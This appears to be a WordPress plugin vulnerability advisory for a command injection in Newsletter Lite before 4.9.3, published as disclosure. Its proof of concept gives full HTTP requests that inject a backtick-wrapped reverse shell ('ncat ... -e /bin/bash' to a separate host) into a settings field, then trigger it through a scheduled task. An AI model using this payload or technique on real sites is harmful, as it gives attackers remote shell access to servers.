WordPress Plugin Vulnerabilities
Newsletter Lite < 4.9.3 - Admin+ Command Injection
Description
The plugin does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.
Proof of Concept
[1] Navigate to "Newsletters > Configuration > History & Emails Configuration" ====================== [2] Submit RCE Payload within "Archive Older Than" Field & Save Settings. The payload must be in HTTP parameter "emailarchive_olderthan" and escaped with backticks in format ` <PAYLOAD> `#, as shown below: POST /wp-admin/admin.php?page=newsletters-settings HTTP/1.1 Host: 192.168.178.130 Content-Length: 13688 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.178.130 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5lVCjZQhpa9vBS0n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: -- SNIP -- Connection: close -- SNIP -- ------WebKitFormBoundary5lVCjZQhpa9vBS0n Content-Disposition: form-data; name="emailarchive_olderthan" ` ncat 192.168.1.127 -e /bin/bash `# ------WebKitFormBoundary5lVCjZQhpa9vBS0n Content-Disposition: form-data; name="theme_folder" default2 ------WebKitFormBoundary5lVCjZQhpa9vBS0n Content-Disposition: form-data; name="loadstyles[]" newsletters-bootstrap ------WebKitFormBoundary5lVCjZQhpa9vBS0n Content-Disposition: form-data; name="loadstyles_handles[newsletters-bootstrap]" -- SNIP -- ====================== [3] Trigger the Payload by Navigating to Newsletters > Configuration > Scheduled Tasks > Email Archiving , then click "Run Now". The below GET request will be issued: GET /wp-admin/admin.php?page=newsletters-settings-tasks&method=runschedule&hook=newsletters_emailarchivehook HTTP/1.1 Host: 192.168.178.130 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings-tasks&wpmlupdated=true&wpmlmessage=Task+has+been+executed+successfully%21 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: -- SNIP -- Connection: close ====================== [4] The user's input will then be unsafely passed to PHP's exec() function, resulting in arbitrary command execution.
Affects Plugins
References
CVE
Classification
Type
COMMAND INJECTION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Karolis Narvilas
Submitter
Karolis Narvilas
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-10-05 (about 7 months ago)
Added
2023-10-05 (about 7 months ago)
Last Updated
2023-10-05 (about 7 months ago)